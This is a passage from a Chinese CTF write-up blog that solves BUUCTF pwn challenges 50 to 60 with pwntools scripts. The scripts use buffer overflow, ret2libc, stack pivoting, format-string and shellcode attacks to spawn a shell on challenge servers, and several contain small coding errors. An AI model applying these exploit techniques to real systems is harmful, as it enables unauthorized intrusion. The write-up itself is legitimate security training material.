<p>system(&#x2F;sh)也可以getshell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28502</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sh = <span class="number">0x08048670</span></span><br><span class="line">call_sys = <span class="number">0x8048529</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span>+p32(call_sys)+p32(sh)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="50-mrctf2020-easyoverflow"><a href="#50-mrctf2020-easyoverflow" class="headerlink" title="50 mrctf2020_easyoverflow"></a>50 mrctf2020_easyoverflow</h2><p><em><strong>栈数据覆盖</strong></em></p>
<p>发现当<code>check(v5)</code>等于<code>n0t_r3@11y_f1@g</code>时会getshell，然后<code>v4</code>的读入不限制长度，可以覆盖掉v5的值</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">29336</span>)</span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x30</span>+<span class="string">b&#x27;n0t_r3@11y_f1@g&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="51-bbys-tu-2016"><a href="#51-bbys-tu-2016" class="headerlink" title="51 bbys_tu_2016"></a>51 bbys_tu_2016</h2><p><em><strong>ret2text</strong></em></p>
<p>ida里面的偏移有问题，需要动态调试看看</p>
<p><img src="/./images/image-20250206135324577.png" alt="image-20250206135324577"></p>
<p>这里<code>-14</code>，说明偏移为14</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25770</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">flag_addr = <span class="number">0x804856D</span></span><br><span class="line">payload = <span class="string">b&#x27;b&#x27;</span>*<span class="number">0x18</span>+p32(flag_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="52-xdctf2015-pwn200"><a href="#52-xdctf2015-pwn200" class="headerlink" title="52 xdctf2015_pwn200"></a>52 xdctf2015_pwn200</h2><p><em><strong>ret2libc</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">e=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25844</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">write_got=e.got[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">write_plt=e.plt[<span class="string">&quot;write&quot;</span>]</span><br><span class="line"></span><br><span class="line">main_add=e.sym[<span class="string">&quot;main&quot;</span>]</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(write_plt)+p32(main_add)+p32(<span class="number">1</span>)+p32(write_got)+p32(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;Welcome to XDCTF2015~!\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">write=u32(p.recvuntil(<span class="string">&#x27;\xf7&#x27;</span>)[-<span class="number">4</span>:])</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;write:&quot;</span>,<span class="built_in">hex</span>(write))</span><br><span class="line"></span><br><span class="line">libc_base=write-<span class="number">0xd43c0</span></span><br><span class="line"></span><br><span class="line">system = <span class="number">0x3a940</span> + libc_base</span><br><span class="line">bin_sh = <span class="number">0x15902b</span> + libc_base</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;Welcome to XDCTF2015~!\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload2=<span class="string">b&quot;a&quot;</span>*(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(system)+p32(main_add)+p32(bin_sh)</span><br><span class="line"></span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="53-wustctf2020-closed"><a href="#53-wustctf2020-closed" class="headerlink" title="53 wustctf2020_closed"></a>53 wustctf2020_closed</h2><p><em><strong>重定向</strong></em></p>
<p>ida看一下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">vulnerable</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;HaHaHa!\nWhat else can you do???&quot;</span>);</span><br><span class="line">  close(<span class="number">1</span>);</span><br><span class="line">  close(<span class="number">2</span>);</span><br><span class="line">  <span class="keyword">return</span> shell();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>关闭了标准输出（1）和错误输出（2），就算是getshell了也不会得到回显。所以可以利用<code>exec 1&gt;&amp;0</code>将标准输出重定向到标准输入</p>
<h3 id="标准文件描述符"><a href="#标准文件描述符" class="headerlink" title="标准文件描述符"></a>标准文件描述符</h3><ul>
<li><strong>标准输入（stdin）</strong>：使用文件描述符0（FD 0）表示，默认情况下终端键盘输入与其关联。</li>
<li><strong>标准输出（stdout）</strong>：使用文件描述符1（FD 1）表示，默认情况下终端屏幕显示与其关联。</li>
<li><strong>标准错误（stderr）</strong>：使用文件描述符2（FD 2）表示，默认情况下终端屏幕显示与其关联。</li>
</ul>
<h3 id="重定向"><a href="#重定向" class="headerlink" title="重定向"></a>重定向</h3><p><code>exec 1&gt;&amp;0</code>是Shell命令行中的重定向语法，用于将标准输出重定向到标准输入，<strong>因此后续的输出会被作为输入来处理</strong></p>
<p>所以只需要nc之后输入<code>exec 1&gt;&amp;0</code>就可以了</p>
<h2 id="54-ciscn-2019-s-4"><a href="#54-ciscn-2019-s-4" class="headerlink" title="54 ciscn_2019_s_4"></a>54 ciscn_2019_s_4</h2><p><em><strong>栈迁移</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"><span class="comment">#p = process(&#x27;./pwn&#x27;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">26010</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">leave_ret = <span class="number">0x08048562</span></span><br><span class="line">sys = elf.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">0x24</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x4</span></span><br><span class="line">p.sendafter(<span class="string">&#x27;name?\n&#x27;</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;bbbb&#x27;</span>)</span><br><span class="line"></span><br><span class="line">leak_addr = u32(p.recv(<span class="number">4</span>))	<span class="comment">#	ebp的地址泄露出来</span></span><br><span class="line">log.info(<span class="string">&quot;leak_addr:&quot;</span>+<span class="built_in">hex</span>(leak_addr))</span><br><span class="line">buf = leak_addr-<span class="number">0x38</span>	<span class="comment"># 回到栈顶</span></span><br><span class="line"></span><br><span class="line">payload2 = p32(sys)+p32(<span class="number">0</span>)+p32(buf+<span class="number">0xc</span>)+<span class="string">b&#x27;/bin/sh\x00&#x27;</span>	<span class="comment"># </span></span><br><span class="line">payload2 = payload2.ljust(<span class="number">0x28</span>,<span class="string">b&#x27;a&#x27;</span>)+p32(buf-<span class="number">4</span>)+p32(leave_ret)</span><br><span class="line"></span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="动态调试分析"><a href="#动态调试分析" class="headerlink" title="动态调试分析"></a>动态调试分析</h3><ul>
<li><p>先看下新栈的地址为什么是<code>ebp-0x38</code></p>
<ul>
<li><img src="/./images/image-20250210000514934.png" alt="image-20250210000514934"></li>
<li>这里是寄存器的地址，可以看到我们的字符串输入到了<code>760</code>处、而<code>ebp</code>指向了<code>798</code>处，相差<code>0x3</code>8字节，所以将栈迁移到这里，方便执行我们的输入</li>
</ul>
</li>
<li><p>&#x3D;&#x3D;payload2 &#x3D; (p32(sys)+p32(0)+p32(buf+0xc)+b’&#x2F;bin&#x2F;sh\x00’).ljust(0x28,b’a’)+p32(buf-4)+p32(leave_ret)&#x3D;&#x3D;</p>
<ul>
<li><p><code>p32(buf-4)</code>:将ebp覆盖为了<code>buf-4</code>,因为每执行一条指令之后eip会自动+4，这里将eip退回去，防止跳过指令</p>
</li>
<li><p><code>p32(leave_ret)</code>：将返回地址覆盖为leave</p>
<blockquote>
<p>此时的栈结构</p>
<table>
<thead>
<tr>
<th>buf</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>sys_addr</td>
<td>system函数地址</td>
</tr>
<tr>
<td>0</td>
<td>返回地址（占位）</td>
</tr>
<tr>
<td>buf+12</td>
<td>&#x2F;bin&#x2F;sh的参数地址</td>
</tr>
<tr>
<td>&#x2F;bin&#x2F;sh</td>
<td></td>
</tr>
<tr>
<td>填充的剩余空间</td>
<td></td>
</tr>
<tr>
<td>buf-4</td>
<td>栈迁移后的ebp</td>
</tr>
<tr>
<td>leave</td>
<td>执行leave_ret</td>
</tr>
</tbody></table>
</blockquote>
</li>
</ul>
</li>
</ul>
<h2 id="55-ZJCTF-2019-Login"><a href="#55-ZJCTF-2019-Login" class="headerlink" title="55 [ZJCTF 2019]Login"></a>55 [ZJCTF 2019]Login</h2><p>栈追踪？或许叭</p>
<p>函数是用c++写的，看起来有点令人头大</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">❯ checksec pwn</span><br><span class="line">[*] &#x27;/home/pwn/pwn/buuctf/55/pwn&#x27;</span><br><span class="line">    Arch:       amd64-64-little</span><br><span class="line">    RELRO:      Partial RELRO</span><br><span class="line">    Stack:      Canary found</span><br><span class="line">    NX:         NX enabled</span><br><span class="line">    PIE:        No PIE (0x400000)</span><br><span class="line">    Stripped:   No</span><br></pre></td></tr></table></figure>

<p>ida查看</p>
<img src="./images/image-20250216001902396.png" alt="image-20250216001902396" style="zoom:80%;" />

<p>在第14和16行发现要输入的账号和密码，不过肯定没有这么简单，执行看看</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">❯ ./pwn</span><br><span class="line"> _____   _  ____ _____ _____   _                _</span><br><span class="line">|__  /  | |/ ___|_   _|  ___| | |    ___   __ _(_)_ __</span><br><span class="line">  / /_  | | |     | | | |_    | |   / _ \ / _` | | &#x27;_ \</span><br><span class="line"> / /| |_| | |___  | | |  _|   | |__| (_) | (_| | | | | |</span><br><span class="line">/____\___/ \____| |_| |_|     |_____\___/ \__, |_|_| |_|</span><br><span class="line">                                          |___/</span><br><span class="line">Please enter username: admin</span><br><span class="line">Please enter password: 2jctf_pa5sw0rd</span><br><span class="line">Password accepted: Password accepted:</span><br><span class="line"></span><br><span class="line">[1]    4014 segmentation fault  ./pwn</span><br></pre></td></tr></table></figure>

<p>&#x3D;&#x3D;寄&#x3D;&#x3D;</p>
<p>看别人的汇编发现在<code>password_checker</code>函数中有一个隐蔽的错误</p>
<img src="./images/image-20250216002126070.png" alt="image-20250216002126070" style="zoom: 80%;" />

<p>主可以看到在<code>0x400A54</code>位置处有一个<code>call rax</code>指令，那么我们将rax修改为后门函数的地址就可以了（默认你找到那个后门函数了）</p>
<img src="./images/image-20250216002324164.png" alt="image-20250216002324164" style="zoom:80%;" />

<p>可以在<code>0x400A89</code>位置处发现rax的值由<code>var_18</code>确定，那么去找一下<code>var_18</code>在哪里</p>
<img src="./images/image-20250216002503305.png" alt="image-20250216002503305" style="zoom:80%;" />

<p>有的，兄弟，有的…</p>
<p>从<code>s</code>处（ebp-0x60)开始，到<code>var_18</code>(ebp-0x18),再除去已经输入的密码<code>2jctf_pa5sw0rd\x00</code>(0xe长度),我们需要填充的数据量为<code>0x60 - 0x18 - 0xe = 0x3a</code></p>
<p>所以exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">25872</span>)</span><br><span class="line">backdoor = <span class="number">0x400e88</span></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;: &#x27;</span>,<span class="string">&#x27;admin&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;: &#x27;</span>,<span class="string">b&#x27;2jctf_pa5sw0rd&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x3a</span>+p64(backdoor))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="56-picoctf-2018-shellcode"><a href="#56-picoctf-2018-shellcode" class="headerlink" title="56 picoctf_2018_shellcode"></a>56 picoctf_2018_shellcode</h2><p><em><strong>ret2shellcode</strong></em></p>
<p>题比较简单，尝试了一下盲打</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">❯ ./pwn</span><br><span class="line">Enter a string!</span><br><span class="line">aaaaaa</span><br><span class="line">aaaaaa</span><br><span class="line">Thanks! Executing now...</span><br><span class="line">[1]    2462 segmentation fault  ./pwn</span><br></pre></td></tr></table></figure>

<p>根据运行情况，猜测是输入相关字符串并当作函数执行，所以直接写入<code>shellcode</code>试试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">28483</span>)</span><br><span class="line">p.sendline(asm(shellcraft.sh()))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>然后打通了</p>
<h2 id="57-hitcontraining-magicheap"><a href="#57-hitcontraining-magicheap" class="headerlink" title="57 hitcontraining_magicheap"></a>57 hitcontraining_magicheap</h2><p>施工中</p>
<h2 id="58-jarviso-level1"><a href="#58-jarviso-level1" class="headerlink" title="58 jarviso_level1"></a>58 jarviso_level1</h2><p>本身应该挺简单的，但是远程和本地的输出不一样</p>
<p>本地：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;:&#x27;</span>)</span><br><span class="line">buf_addr = <span class="built_in">int</span>(p.recv(<span class="number">10</span>),<span class="number">16</span>)</span><br><span class="line">log.info(<span class="built_in">hex</span>(buf_addr))</span><br><span class="line"></span><br><span class="line">payload = asm(shellcraft.sh()).ljust(<span class="number">0x87</span>+<span class="number">0x4</span>,<span class="string">b&#x27;b&#x27;</span>)+p32(buf_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>接受buf的地址，然后<code>ret</code>回<code>buf</code>处执行<code>shellcode</code></p>
<p>但是远程要先输入再回显，所以只能<code>ret2libc</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p=remote(<span class="string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="number">29446</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">main_addr=<span class="number">0x80484b7</span></span><br><span class="line">write_plt=elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got=elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x88</span>+<span class="number">0x4</span>)+p32(write_plt)+p32(main_addr)+p32(<span class="number">0x1</span>)+p32(write_got)+p32(<span class="number">0x4</span>)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line">write_addr=u32(r.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;write&#x27;</span>,write_addr)</span><br><span class="line">libc_base=write_addr-libc.dump(<span class="string">&#x27;write&#x27;</span>)</span><br><span class="line"></span><br><span class="line">system_addr=libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh=libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line">payload =<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x88</span>+<span class="number">0x4</span>)+p32(system_addr)+p32(main_addr)+ p32(bin_sh)</span><br><span class="line"></span><br><span class="line">p.send(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="59-axb-2019-fmt32"><a href="#59-axb-2019-fmt32" class="headerlink" title="59 axb 2019 fmt32"></a>59 axb 2019 fmt32</h2><p><em><strong>fmt+ret2libc</strong></em></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>,log_level = <span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = <span class="string">&#x27;wt.exe -d . wsl.exe -d Ubuntu&#x27;</span>.split()</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line"><span class="comment">#libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">printf_got = elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">printf_plt = elf.plt[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>+p32(printf_got)+<span class="string">b&#x27;b&#x27;</span>+<span class="string">b&#x27;%8$s&#x27;</span></span><br><span class="line">p.sendlineafter(<span class="string">b&#x27;me:&#x27;</span>, payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&#x27;b&#x27;</span>)</span><br><span class="line">printf_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">log.info(<span class="string">&quot;prinf_addr:&quot;</span>+<span class="built_in">hex</span>(printf_addr))</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;printf&#x27;</span>,printf_addr)</span><br><span class="line">libc_base = printf_addr - libc.dump(<span class="string">&#x27;printf&#x27;</span>)</span><br><span class="line">sys = libc_base+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh = libc_base+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">b&#x27;a&#x27;</span>+fmtstr_payload(<span class="number">8</span>,&#123;printf_got:system&#125;,wirte_size = <span class="string">&#x27;byte&#x27;</span>,numbwritten = <span class="number">0xa</span>)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line">p.sendline(<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">❯ checksec pwn</span><br><span class="line">[*] &#x27;/home/pwn/pwn/buuctf/59/pwn&#x27;</span><br><span class="line">    Arch:       i386-32-little</span><br><span class="line">    RELRO:      Partial RELRO</span><br><span class="line">    Stack:      No canary found</span><br><span class="line">    NX:         NX enabled</span><br><span class="line">    PIE:        No PIE (0x8048000)</span><br><span class="line">    Stripped:   No</span><br></pre></td></tr></table></figure>

<p><img src="/./images/image-20250216163343339.png" alt="image-20250216163343339"></p>
<p>在第25行有明显<code>fmt漏洞</code>,经过输入查询发现我们的输入偏移为8（但不完全是）</p>
<blockquote>
<p>gdb测试的时候发现第一个字符的输入是存放在了第7个偏移处，所以应该先填充一个字符，防止后来的地址出现问题</p>
</blockquote>
<p>在<code>printf_got</code>后面加一个<code>b&#39;b&#39;</code>为了做为<code>recvuntil()</code>的标记，泄露printf地址后就可以libc了</p>
<h2 id="60-cinscn-s-9"><a href="#60-cinscn-s-9" class="headerlink" title="60 cinscn_s_9"></a>60 cinscn_s_9</h2><p><em><strong>shellcode</strong></em></p>
<p><code>checksec</code>一下</p>
